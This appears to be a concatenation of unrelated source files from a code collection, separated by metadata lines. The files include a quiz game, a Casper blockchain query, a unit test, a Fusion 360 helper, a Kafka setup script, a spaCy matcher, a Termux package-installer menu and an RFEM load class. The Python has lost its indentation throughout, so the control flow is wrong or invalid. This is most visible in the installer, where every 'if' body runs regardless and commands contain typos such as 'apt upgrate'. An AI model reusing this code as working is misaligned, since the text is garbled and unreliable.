guess5 = input("What is the name of ALU Rwanda's Dean?")
if alu(guess5):
Right += 1
else:
check(guess5)
tries += 1
guess6 = input("Who is in charge of Student Life?")
if alu(guess6):
Right += 1
else:
check(guess6)
tries += 1
if tries == 6:
exit("You lost")
guess7 = input("What is the name of our Lab?")
if alu(guess7):
Right += 1
else:
check(guess7)
tries += 1
if tries == 6:
exit("You lost")
guess8 = int(input("How many students do we have in Year 2 CS?"))
if alu(guess8):
Right += 1
else:
check(guess8)
tries += 1
if tries == 6:
exit("You lost")
guess9 = int(input("How many degrees does ALU offer?"))
if alu(guess9):
Right += 1
else:
check(guess9)
tries += 1
if tries == 6:
exit("You lost")
guess10 = input("Where are the headquarters of ALU?")
if alu(guess10):
Right += 1
else:
check(guess10)
tries += 1
if tries == 6:
exit("You lost")
| 4.28125 | 4 |
node-api/get-block-transfers/request.py | Venoox/casper-integrations | 5 | 11051 | <reponame>Venoox/casper-integrations
import json
import os
import pycspr
# A known casper test-net node address.
_NODE_ADDRESS = os.getenv("CASPER_NODE_ADDRESS", "192.168.127.12")
# A known block hash.
_BLOCK_HASH: bytes = bytes.fromhex("c7148e1e2e115d8fba357e04be2073d721847c982dc70d5c36b5f6d3cf66331c")
# A known block height.
_BLOCK_HEIGHT: int = 20652
def main():
"""Retrieves transfers by block.
"""
# Set client.
client = pycspr.NodeClient(pycspr.NodeConnectionInfo(host=_NODE_ADDRESS))
# Set block by known hash.
block_transers_1: tuple = client.queries.get_block_transfers(_BLOCK_HASH)
# Set block by known height.
block_transers_2: tuple = client.queries.get_block_transfers(_BLOCK_HEIGHT)
# Verify block information equivalence.
assert block_transers_1 == block_transers_2
print("-----------------------------------------------------------------------------------------------------")
print(f"QUERIED TEST-NET NODE {_NODE_ADDRESS}")
print("-----------------------------------------------------------------------------------------------------")
print(f"Block transfers = {json.dumps(block_transers_1, indent=4)}")
print("-----------------------------------------------------------------------------------------------------")
if __name__ == "__main__":
try:
main()
except Exception as err:
print(f"API ERROR @ NODE {_NODE_ADDRESS} :: {err}")
| 2.4375 | 2 |
tests/test_util.py | re3turn/twicrawler | 14 | 11052 | import nose2.tools
from typing import Union
from app.util import has_attributes
class SampleClass:
pass
class TestUtil:
@nose2.tools.params(
('SET_VALUE', True),
(None, False),
('NO_ATTRIBUTE', False),
(False, True),
('', True),
(0, True),
)
def test_has_attributes(self, value: Union[bool, int, str, None], ans: bool) -> None:
obj = SampleClass()
if value != 'NO_ATTRIBUTE':
setattr(obj, 'attr', value)
has_attr = has_attributes(obj, 'attr')
assert has_attr is ans
| 2.828125 | 3 |
commands/data/fusion_data.py | Christ0ph990/Fusion360DevTools | 3 | 11053 | # Copyright 2022 by Autodesk, Inc.
# Permission to use, copy, modify, and distribute this software in object code form
# for any purpose and without fee is hereby granted, provided that the above copyright
# notice appears in all copies and that both that copyright notice and the limited
# warranty and restricted rights notice below appear in all supporting documentation.
#
# AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS. AUTODESK SPECIFICALLY
# DISCLAIMS ANY IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE.
# AUTODESK, INC. DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE
# UNINTERRUPTED OR ERROR FREE.
from dataclasses import dataclass, field
import base64
import pprint
import adsk.core
app = adsk.core.Application.get()
def b64_url_safe_encode(string):
encoded_bytes = base64.urlsafe_b64encode(string.encode("utf-8"))
encoded_str = str(encoded_bytes, "utf-8")
return encoded_str.rstrip("=")
def b64_url_safe_decode(string):
return str(base64.urlsafe_b64decode(string.lstrip('a.') + "==="), "utf-8")
def link_for_url(url: str) -> str:
return f"<a href={url}>{url}</a>"
@dataclass
class FusionData:
# This should be set at creation or at least validity checked BEFORE calling this
data_file: adsk.core.DataFile = field(repr=False, default=None)
# THe following are computed based on current state of Fusion and are not "printed" by default
hub: adsk.core.DataHub = field(repr=False, init=False)
project: adsk.core.DataProject = field(repr=False, init=False)
folder: adsk.core.DataFolder = field(repr=False, init=False)
user: adsk.core.User = field(repr=False, init=False)
# All String Properties
file_name: str = field(init=False)
user_email: str = field(init=False)
hub_name: str = field(init=False)
hub_id: str = field(init=False)
hub_id_decoded: str = field(init=False)
hub_team_name: str = field(init=False)
project_name: str = field(init=False)
project_id: str = field(init=False)
project_id_decoded: str = field(init=False)
folder_name: str = field(init=False)
folder_id: str = field(init=False)
lineage_urn: str = field(init=False)
version_urn: str = field(init=False)
base64_lineage_urn: str = field(init=False)
base64_version_urn: str = field(init=False)
open_from_web: str = field(init=False)
fusion_team_url: str = field(init=False)
fusion_team_link: str = field(init=False)
def __post_init__(self):
# THe following are computed based on current state of Fusion and are not "printed" by default
self.hub = app.data.activeHub
self.project = self.data_file.parentProject
self.folder = self.data_file.parentFolder
self.user = app.currentUser
# All String Properties
self.file_name: str = self.data_file.name
self.user_email: str = self.user.email
self.hub_name: str = self.hub.name
self.hub_id: str = self.hub.id
self.hub_id_decoded: str = b64_url_safe_decode(self.hub_id)
self.hub_team_name: str = self.hub_id_decoded.split(':')[-1]
self.project_name: str = self.project.name
self.project_id: str = self.project.id
self.project_id_decoded: str = b64_url_safe_decode(self.project_id)
self.folder_name: str = self.folder.name
self.folder_id: str = self.folder.id
self.lineage_urn: str = self.data_file.id
self.version_urn: str = self.data_file.versionId
self.base64_lineage_urn: str = b64_url_safe_encode(self.lineage_urn)
self.base64_version_urn: str = b64_url_safe_encode(self.version_urn)
team_base_url: str = 'autodesk360'
self.open_from_web: str = f"fusion360://userEmail={self.user_email}&" \
f"lineageUrn={self.lineage_urn}&" \
f"hubUrl=https://{self.hub_team_name}.{team_base_url}.com&" \
f"documentName={self.file_name}"
self.fusion_team_url: str = f"https://{self.hub_team_name}.{team_base_url}.com/g/data/{self.base64_lineage_urn}"
self.fusion_team_link = link_for_url(self.fusion_team_url)
def str_dict(self):
return {k: v
for k, v in self.__dict__.items()
if isinstance(v, str)}
def pretty_string(self):
return pprint.pformat(self.str_dict())
| 2.015625 | 2 |
src/config-producer/config_topic.py | DougFigueroa/realde-kafka-assesment | 0 | 11054 | """
This process creates the two kafka topics to be used.
The input-topic with ten partitions and the output-topic with one partition.
Also preloads the kafka cluster with test data (if flag is set to true).
"""
import os
import time
import json
import logging
from confluent_kafka.admin import AdminClient, NewTopic
from confluent_kafka import Producer
# defining logger
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# reading the environement variables defined on the docker compose
KAFKA_CLUSTER = os.environ.get('KAFKA_CLUSTER_CONNECT', 'localhost:9092')
LOAD_DATA = os.environ.get('LOAD_SAMPLE_DATA', False)
logging.info(
(f'>Env variables: KAFKA_CLUSTER_CONNECT={KAFKA_CLUSTER} '
f'LOAD_SAMPLE_DATA={LOAD_DATA}'))
BROKER_CONFIG = {'bootstrap.servers': KAFKA_CLUSTER}
def read_json_file(file_route: str) -> dict:
"""
Read the json configuration file to set topics and partitions.
Args:
- str, the route(with name) of the configuration file.
Returns:
- dict, with the configurations defined on the json file.
"""
with open(file_route, 'r') as f:
config = json.load(f)
logging.info('JSON file readed.')
return config
def create_topics(admin: object, config: dict) -> None:
"""Create the kafka topics based on the configuration file.
Args:
- object, the admin client kafka object.
- dict, json configuration of the process.
Returns: None.
"""
# read the topic configuration and create the NewTopic objects
topics = []
for k, v in config.items():
topics.append(NewTopic(
v['topic_name'],
num_partitions=v['partitions_quantity'],
replication_factor=1
)
)
logging.info(f'Starting the creation of the topics: {topics}...')
creation_response = admin.create_topics(topics)
# the response has futures (which runs asynchronously) so we validate them
# to see if they succeeded or not
for topic, f in creation_response.items():
try:
f.result()
logging.info(f'Creation of the topic {topic} completed.')
except Exception as e:
logger.error(f'Error creating the kafka topic: {topic}. {e}')
raise Exception(f'Error creating the kafka topic: {topic}. {e}')
def list_topics_and_config(admin: object) -> None:
"""Check the topics that exists at a specifid.
And displays other configs of the Kafka Cluster.
Args:
- object, the admin client kafka object.
Returns: None.
"""
list_response = admin.list_topics(timeout=5)
# get all the broker info
logging.info('>Broker details:')
for counter, broker in enumerate(list_response.brokers.items(), start=1):
logging.info(f'{counter}-Broker info: {broker}')
logging.info('>Topics details:')
# get all the topic names
for counter, topic_data in enumerate(list_response.topics.items(), start=1):
logging.info(f'{counter}-Topic info: {topic_data}')
def load_sample_data(topic: str, sample_data: list) -> None:
"""Loads the sample data to the input kafka topic.
This will load data across 10 different partitions.
Args:
- str, the topic name where the data is going to be loaded.
- list, the sample data to be loaded by the producer across
all the partitions of the specified topic.
Returns: None
"""
producer = Producer(BROKER_CONFIG)
# iterate through partitions
for data in sample_data:
for number in data['values']:
try:
producer.produce(topic, str(number), None, data['partition'])
except Exception as e:
logger.error(
f'Producer failed to produce a message to the topic. {e}')
raise Exception(
f'Failed to produce a message from Kakfia. {e}')
producer.poll(0)
# ensure all the delivery queue has been loaded
producer.flush()
logging.info('Data successfully produced and loaded to the specify topic.')
def main() -> None:
"""Orchestrates all the process execution.
From configuring the cluster topics to load the sample input data.
"""
configuration_file = 'topic_config.json'
data_file = 'sample_data.json'
time.sleep(5)
actual_path = os.path.dirname(__file__)
configuration_path = os.path.join(actual_path, configuration_file)
data_path = os.path.join(actual_path, data_file)
config = read_json_file(configuration_path)
# defining the admin client needed to create topics
admin = AdminClient(BROKER_CONFIG)
create_topics(admin, config)
# this step its only for validation purposes
list_topics_and_config(admin)
# start the load of the sample data to the input topic
if LOAD_DATA:
in_topic_name = config['in_topic_conf']['topic_name']
sample_data = read_json_file(data_path)
load_sample_data(in_topic_name, sample_data)
if __name__ == '__main__':
main()
| 2.734375 | 3 |
deallocate/params.py | jefferycwc/tacker-example-plugin | 0 | 11055 | OS_MA_NFVO_IP = '192.168.1.197'
OS_USER_DOMAIN_NAME = 'Default'
OS_USERNAME = 'admin'
OS_PASSWORD = '<PASSWORD>'
OS_PROJECT_DOMAIN_NAME = 'Default'
OS_PROJECT_NAME = 'admin' | 1.125 | 1 |
anoplura/patterns/body_part.py | rafelafrance/traiter_lice | 0 | 11056 | <gh_stars>0
"""Extract body part annotations."""
import re
import spacy
from traiter.const import COMMA
from traiter.patterns.matcher_patterns import MatcherPatterns
from anoplura.pylib.const import COMMON_PATTERNS
from anoplura.pylib.const import CONJ
from anoplura.pylib.const import MISSING
from anoplura.pylib.const import REPLACE
JOINER = CONJ + COMMA
JOINER_RE = "|".join(JOINER + [r"\s"])
JOINER_RE = re.compile(rf"\b(?:{JOINER_RE})\b", flags=re.IGNORECASE)
MISSING_RE = "|".join([fr"\b{m}\b" for m in MISSING])
MISSING_RE = re.compile(MISSING_RE, flags=re.IGNORECASE)
BODY_PART = MatcherPatterns(
"body_part",
on_match="anoplura.body_part.v1",
decoder=COMMON_PATTERNS
| {
"seg": {"ENT_TYPE": "segmented"},
"ord": {"ENT_TYPE": {"IN": ["ordinal", "number_word"]}},
},
patterns=[
"missing part+",
"missing? any_part* part",
"part+ &/,/or* part* &/,/or* part+",
"part+ ord -? ord",
"part+ 99? -? 99",
"part+ ord?",
"part+ 99?",
"part+ ord -? seg",
"part+ 99 -? seg",
"ord? -? seg? part+",
"99 - seg part+",
],
)
@spacy.registry.misc(BODY_PART.on_match)
def body_part(ent):
"""Enrich a body part span."""
data = {}
parts = JOINER_RE.split(ent.text.lower())
parts = [REPLACE.get(p, p) for p in parts]
text = " ".join(parts)
text = re.sub(r"\s*-\s*", "-", text)
text = REPLACE.get(text, text)
if MISSING_RE.search(ent.text.lower()) is not None:
data["missing"] = True
data["body_part"] = text
ent._.data = data
| 2.375 | 2 |
Termux-pkg-apt.py | Hironotori/Termux-pkg-apt | 1 | 11057 | #!/usr/bin/python3
import os
import time
import sys
os.system("clear")
print('''\033[91m
CREATED BY Hironotori
''')
def slowprint(s):
for c in s + '\n' :
sys.stdout.write(c)
sys.stdout.flush()
slowprint(''' \033[93m
[1] apt-pkg pip-pip3 [2] apt-pkg python
[3] apt-pkg python2 [4] apt-pkg bash
[5] apt-pkg git [6] apt-pkg perl
[7] apt-pkg nano [8] apt-pkg curl
[9] apt-pkg openssl [10] apt-pkg openssh
[11] apt-pkg wget [12] apt-pkg clang
[13] apt-pkg nmap [14] apt-pkg w3m
[15] apt-pkg ruby [16] apt-pkg dnsutils
[17] apt-pkg coreutils [18] apt-pkg fish.
[19] apt-pkg zip [20] apt-pkg figlet.
[21] apt-pkg cowsay [22] apt-pkg unzip.
[23] apt-pkg vim [24] apt-pkg wcalc.
[25] apt-pkg bmon [26] apt-pkg unrar.
[27] apt-pkg proot [28] apt-pkg golang.
[29] apt-pkg tsu [30] apt-pkg tor.
[31] apt-pkg php
[00] Установить все Вместе [0] Выход''')
print (" ")
choice = input("\033[93mВыберите пункт : ")
if choice == '0' : sys.exit()
if choice == '1' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system("python -m pip install --upgrade pip")
os.system ("pip3 install --upgrade setuptools pip")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '2' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install python -y")
os.system ("pkg upgrade python -y")
os.system ("apt install python -y")
os.system ("apt upgrade python -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '3' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install python2 -y")
os.system ("pkg upgrade python2 -y")
os.system ("apt install python2 -y")
os.system ("apt upgrade python2 -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '4' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install bash")
os.system ("apt install bash")
os.system ("pkg upgrade bash")
os.system ("apt upgrade bash")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '5' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("apt install git -y")
os.system ("pkg install git -y")
os.system ("pkg upgrade git -y")
os.system ("apt upgrade git -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '6' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install perl -y")
os.system ("apt install perl -y")
os.system ("pkg upgrade perl -y")
os.system ("apt upgrade perl -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '7' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install nano -y")
os.system ("apt install nano -y")
os.system ("pkg upgrade nano -y")
os.system ("apt upgrade nano -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '8' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install curl -y")
os.system ("apt install curl -y")
os.system ("pkg upgrade curl -y")
os.system ("apt upgrade curl -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '9' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install openssl -y")
os.system ("apt install openssl -y")
os.system ("pkg upgrade openssl -y")
os.system ("apt upgrade openssl -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '10' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install openssh -y")
os.system ("apt install openssh -y")
os.system ("pkg upgrade openssh -y")
os.system ("apt upgrade openssh -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '11' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install wget -y")
os.system ("apt install wget -y")
os.system ("pkg upgrade wget -y")
os.system ("apt upgrade wget -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '12' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install clang -y")
os.system ("apt install clang -y")
os.system ("pkg upgrade clang -y")
os.system ("apt upgrade clang -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '13' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install nmap -y")
os.system ("apt install nmap -y")
os.system ("pkg upgrade nmap -y")
os.system ("apt upgrade nmap -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '14' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install w3m -y")
os.system ("apt install w3m -y")
os.system ("pkg upgrade w3m -y")
os.system ("apt upgrade w3m -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '15' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install ruby -y")
os.system ("apt install ruby -y")
os.system ("pkg upgrade ruby -y")
os.system ("apt upgrade ruby -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '16' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install dnsutils -y")
os.system ("apt install dnsutils -y")
os.system ("pkg upgrade dnsutils -y")
os.system ("apt upgrade dnsutils -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '17' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install coreutils -y")
os.system ("apt install coreutils -y")
os.system ("pkg upgrade coreutils -y")
os.system ("apt upgrade coreutils -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '18' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install fish -y")
os.system ("apt install fish -y")
os.system ("pkg upgrade fish -y")
os.system ("apt upgrade fish -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '19' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install zip -y")
os.system ("apt install zip -y")
os.system ("pkg upgrade zip -y")
os.system ("apt upgrade zip -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '20' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install figlet -y")
os.system ("apt install figlet -y")
os.system ("pkg upgrade figlet -y")
os.system ("apt upgrade figlet -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '21' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install cowsay -y")
os.system ("apt install cowsay -y")
os.system ("pkg upgrade cowsay -y")
os.system ("apt upgrade cowsay -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '22' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install unzip -y")
os.system ("apt install unzip -y")
os.system ("pkg upgrade unzip -y")
os.system ("apt upgrade unzip -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '23' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install vim -y")
os.system ("apt install vim -y")
os.system ("pkg upgrade vim -y")
os.system ("apt upgrade vim -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '24' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install wcalc -y")
os.system ("apt install wcalc -y")
os.system ("pkg upgrade wcalc -y")
os.system ("apt upgrade wcalc -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '25' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install bmon -y")
os.system ("apt install bmon -y")
os.system ("pkg upgrade bmon -y")
os.system ("apt upgrade bmon -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '26' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install unrar -y")
os.system ("apt install unrar -y")
os.system ("pkg upgrade unrar -y")
os.system ("apt upgrade unrar -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '27' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install proot -y")
os.system ("apt install proot -y")
os.system ("pkg upgrade proot -y")
os.system ("apt upgrade proot -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '28' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install golang -y")
os.system ("apt install golang -y")
os.system ("pkg upgrade golang -y")
os.system ("apt upgrade golang -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '29' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system("pkg install tsu-y")
os.system ("apt install tsu -y")
os.system ("pkg upgrade tsu -y")
os.system ("apt upgrade tsu -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '30' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install tor")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '31' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install php -y")
os.system ("pkg upgrade php -y")
os.system ("apt install php -y")
os.system ("apt upgrade php -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '00' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrate")
os.system ("apt update")
os.system ("pkg update")
os.system("python -m pip install --upgrade pip")
os.system ("pip3 install --upgrade setuptools pip")
os.system ("pkg install python -y")
os.system ("pkg upgrade python -y")
os.system ("apt install python -y")
os.system ("apt upgrade python -y")
os.system ("pkg install python2 -y")
os.system ("pkg upgrade python2 -y")
os.system ("apt install python2 -y")
os.system ("apt upgrade python2 -y")
os.system ("pkg install php -y")
os.system ("pkg upgrade php -y")
os.system ("apt install php -y")
os.system ("apt upgrade php -y")
os.system ("pkg install bash")
os.system ("apt install bash")
os.system ("pkg upgrade bash")
os.system ("apt upgrade bash")
os.system ("apt install git -y")
os.system ("pkg install git -y")
os.system ("pkg upgrade git -y")
os.system ("apt upgrade git -y")
os.system ("pkg install perl -y")
os.system ("apt install perl -y")
os.system ("pkg upgrade perl -y")
os.system ("apt upgrade perl -y")
os.system ("pkg install nano -y")
os.system ("apt install nano -y")
os.system ("pkg upgrade nano -y")
os.system ("apt upgrade nano -y")
os.system ("pkg install curl -y")
os.system ("apt install curl -y")
os.system ("pkg upgrade curl -y")
os.system ("apt upgrade curl -y")
os.system ("pkg install openssl -y")
os.system ("apt install openssl -y")
os.system ("pkg upgrade openssl -y")
os.system ("apt upgrade openssl -y")
os.system ("pkg install openssh -y")
os.system ("apt install openssh -y")
os.system ("pkg upgrade openssh -y")
os.system ("apt upgrade openssh -y")
os.system ("pkg install wget -y")
os.system ("apt install wget -y")
os.system ("pkg upgrade wget -y")
os.system ("apt upgrade wget -y")
os.system ("pkg install clang -y")
os.system ("apt install clang -y")
os.system ("pkg upgrade clang -y")
os.system ("apt upgrade clang -y")
os.system ("pkg install nmap -y")
os.system ("apt install nmap -y")
os.system ("pkg upgrade nmap -y")
os.system ("apt upgrade nmap -y")
os.system ("pkg install w3m -y")
os.system ("apt install w3m -y")
os.system ("pkg upgrade w3m -y")
os.system ("apt upgrade w3m -y")
os.system ("pkg install ruby -y")
os.system ("apt install ruby -y")
os.system ("pkg upgrade ruby -y")
os.system ("apt upgrade ruby -y")
os.system ("pkg install dnsutils -y")
os.system ("apt install dnsutils -y")
os.system ("pkg upgrade dnsutils -y")
os.system ("apt upgrade dnsutils -y")
os.system ("pkg install coreutils -y")
os.system ("apt install coreutils -y")
os.system ("pkg upgrade coreutils -y")
os.system ("apt upgrade coreutils -y")
os.system ("pkg install fish -y")
os.system ("apt install fish -y")
os.system ("pkg upgrade fish -y")
os.system ("apt upgrade fish -y")
os.system ("pkg install zip -y")
os.system ("apt install zip -y")
os.system ("pkg upgrade zip -y")
os.system ("apt upgrade zip -y")
os.system ("pkg install figlet -y")
os.system ("apt install figlet -y")
os.system ("pkg upgrade figlet -y")
os.system ("apt upgrade figlet -y")
os.system ("pkg install cowsay -y")
os.system ("apt install cowsay -y")
os.system ("pkg upgrade cowsay -y")
os.system ("apt upgrade cowsay -y")
os.system ("pkg install unzip -y")
os.system ("apt install unzip -y")
os.system ("pkg upgrade unzip -y")
os.system ("apt upgrade unzip -y")
os.system ("pkg install vim -y")
os.system ("apt install vim -y")
os.system ("pkg upgrade vim -y")
os.system ("apt upgrade vim -y")
os.system ("pkg install wcalc -y")
os.system ("apt install wcalc -y")
os.system ("pkg upgrade wcalc -y")
os.system ("apt upgrade wcalc -y")
os.system ("pkg install bmon -y")
os.system ("apt install bmon -y")
os.system ("pkg upgrade bmon -y")
os.system ("apt upgrade bmon -y")
os.system ("pkg install unrar -y")
os.system ("apt install unrar -y")
os.system ("pkg upgrade unrar -y")
os.system ("apt upgrade unrar -y")
os.system ("pkg install proot -y")
os.system ("apt install proot -y")
os.system ("pkg upgrade proot -y")
os.system ("apt upgrade proot -y")
os.system ("pkg install golang -y")
os.system ("apt install golang -y")
os.system ("pkg upgrade golang -y")
os.system ("apt upgrade golang -y")
os.system("pkg install tsu-y")
os.system ("apt install tsu -y")
os.system ("pkg upgrade tsu -y")
os.system ("apt upgrade tsu -y")
os.system ("pkg install tor")
os.system ("termux-setup-storage")
sys.exit () | 2.421875 | 2 |
RFEM/Loads/solidSetLoad.py | DavidNaizheZhou/RFEM_Python_Client | 16 | 11058 | <reponame>DavidNaizheZhou/RFEM_Python_Client<gh_stars>10-100
from RFEM.initModel import Model, clearAtributes, ConvertToDlString
from RFEM.enums import SolidSetLoadType, SolidSetLoadDistribution, SolidSetLoadDirection
class SolidSetLoad():
def __init__(self,
no: int =1,
load_case_no: int = 1,
solid_sets_no: str= '1',
load_type = SolidSetLoadType.LOAD_TYPE_FORCE,
load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = SolidSetLoadDirection.LOAD_DIRECTION_GLOBAL_Z_OR_USER_DEFINED_W_TRUE,
magnitude: float = 0,
comment: str = '',
params: dict = {}):
# Client model | Solid Load
clientObject = Model.clientModel.factory.create('ns0:solid_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Assigned Solid No.
clientObject.solid_sets = ConvertToDlString(solid_sets_no)
# Load Type
clientObject.load_type = load_type.name
# Load Distribution
clientObject.load_distribution = load_distribution.name
# Load Direction
clientObject.load_direction = load_direction.name
# Load Magnitude
clientObject.uniform_magnitude = magnitude
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Solid Load to client model
Model.clientModel.service.set_solid_set_load(load_case_no, clientObject)
def Force(self,
no: int =1,
load_case_no: int = 1,
solid_sets_no: str= '1',
load_direction = SolidSetLoadDirection.LOAD_DIRECTION_GLOBAL_Z_OR_USER_DEFINED_W_TRUE,
magnitude: float = 0,
comment: str = '',
params: dict = {}):
# Client model | Solid Load
clientObject = Model.clientModel.factory.create('ns0:solid_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Load No.
clientObject.no = no
# Load Case No.
